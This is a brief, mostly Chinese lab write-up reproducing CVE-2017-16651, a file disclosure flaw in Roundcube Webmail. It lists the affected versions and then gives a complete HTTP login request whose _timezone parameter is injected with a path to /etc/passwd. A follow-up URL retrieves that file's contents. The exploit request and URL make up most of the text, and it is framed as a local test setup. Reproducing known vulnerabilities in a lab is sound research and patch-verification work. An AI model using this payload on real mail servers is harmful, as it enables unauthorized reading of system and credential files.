Roundcube Webmail File Disclosure Vulnerability(CVE-2017-16651)

Preface

• Software: https://roundcube.net/
• Versions: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
• CVE: CVE-2017-16651
• Author: Thomas Bruederli
• Release date: 2017-11-09
• Link: Roundcube Webmail File Disclosure Vulnerability

环境搭建

请参考：CentOS6 安装Sendmail + Dovecot + Roundcubemail

漏洞测试

本地环境：CentOS 6 + Roundcube Webmail 1.1.4

url : http://mail.roundcube.com/roundcubemail/

account : user1/123456

登录、抓包，修改_timezone为如下（以读取/etc/passwd文件为例）：

POST /roundcubemail/?_task=login HTTP/1.1
Host: mail.roundcube.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://mail.roundcube.com/roundcubemail/
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Cookie: roundcube_sessid=33mpv2cn5mjdjhjcpfgkaf0oh2; language=en
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_token=b8bdd3abae1d62621594f0de93a12a55&_task=login&_action=login&_timezone[files][1][path]=/etc/passwd&_url=&_user=user1&_pass=123456

访问：http://mail.roundcube.com/roundcubemail/?_task=settings&_action=upload-display&_from=timezone&_file=rcmfile1

便可读取/etc/passwd文件中的内容

就这样...